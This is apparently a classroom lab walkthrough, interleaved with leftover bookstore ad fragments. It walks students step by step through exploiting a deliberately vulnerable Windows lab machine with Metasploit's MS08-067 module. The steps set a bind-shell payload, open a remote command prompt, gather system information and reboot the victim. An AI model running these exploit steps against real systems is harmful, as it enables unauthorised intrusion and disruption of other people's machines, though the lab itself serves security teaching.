This is the machine that will be use to attack the victim machine. Best Price $5.62
or Buy New $58.00

Privacy Information

HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52

Privacy Information

HP-UX 11i Version 2


System Administr...
Marty Poniatowski
3. Starting up the Metasploit MSF Console Best Price $5.36
or Buy New $38.53
1. Start Up Metasploit msfconsole
Instructions:
Privacy Information
1. Applications --> msfconsole --> Exploitation Tools --> Network
Exploitation Tools --> Metasploit Framework --> msfconsole.

converted by [Link]
Note:
Metasploit takes about 5 to 20 seconds to start up.

BSD UNIX Toolbox


Christopher Negus,...

Buy New

Privacy Information

2. msfconsole screen
Note:
This is the msfconsole

3. Search for the MS08-067 Exploit


Instructions:
1. search ms08_067

converted by [Link]
4. Use exploit MS08-067 Exploit
Instructions:
1. use exploit/windows/smb/ms08_067_netapi

5. Show Payloads
Instructions:
1. show payloads

converted by [Link]
6. Set Payloads
Instructions:
1. set PAYLOAD windows/shell_bind_tcp
Note:
This Payload creates Windows Command Shell and Bind TCP Inline

7. Show Options
Instructions:
1. show options
Note:
Notice the Required Column. RPORT and SMBPIPE are already populated,
but RHOST is not.
In the next step, you will populate RHOST with the IP Address of
WindowsVulnerable01.

converted by [Link]
8. Set RHOST and Verify Show Options
Note:
Replace [Link] with your WindowsVulnerable01's IP Address
obtained in (Section 1, Step 4).
Instructions:
1. set RHOST [Link]
2. show options

9. Exploit the Victim Machine


Instructions:
1. exploit
Note:
If the exploit worked you should see a command prompt into the victim
machine. (See Below).

converted by [Link]
10. Issue the systeminfo command
Instructions:
1. systeminfo
Note:
This is the system information report for Windows.

11. Issue the tasklist command


Instructions:
1. tasklist
Note:
This is the command line version of Task Manager in Windows.

converted by [Link]
12. Proof of Lab
Instructions:
1. date
Press enter twice.
2. echo "Your Name"
This should be your actual name.
e.g., echo "John Gray"
Proof of Lab Instructions:
1. Do a PrtScn
2. Paste into a word document
3. Upload to Moodle.

13. Issue the shutdown command


Instructions:
1. shutdown -r
Note:

converted by [Link]
This will reboot the victim windows machine.
Go ahead and check out what popped up on your victim windows machine.
Continue to the next step.

14. System Shutdown Message.


Note:
You should now see a "System Shutdown" message similar to the below.

Proof of Lab
1. Cut and Paste a screen shot that looks similar to Step #12 in Section 3 into a
word document and upload to Moodle.

converted by [Link]

You might also like